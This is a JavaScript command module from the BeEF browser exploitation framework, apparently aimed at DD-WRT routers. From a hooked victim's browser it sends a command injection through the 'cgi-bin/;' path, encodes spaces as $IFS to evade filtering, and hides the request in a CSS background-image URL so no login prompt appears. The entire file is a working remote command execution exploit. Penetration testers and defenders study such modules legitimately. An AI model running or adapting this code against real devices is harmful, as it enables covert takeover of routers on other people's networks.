//
// Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {
    var host = '<%= @host %>';
    var cmd  = '<%= @cmd %>';
    var path = 'cgi-bin/;';

    if (!host.match(/\/$/))
        host += '/';

    if (cmd.indexOf(' ') != -1)
        cmd = cmd.replace(/\s+/g, '$IFS');

    // Prevent auth dialog by generating the request via a CSS URL instead of an invisible iframe.
    var ddwrt_div_<%= @command_id %> = document.createElement('div');
    ddwrt_div_<%= @command_id %>.setAttribute('style', 'background-image: url("' + host + path + cmd + '")');
    document.body.appendChild(ddwrt_div_<%= @command_id %>);

    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=exploit attempted');

    setTimeout(function() { document.body.removeChild(ddwrt_div_<%= @command_id %>) }, 15 * 1000);
});
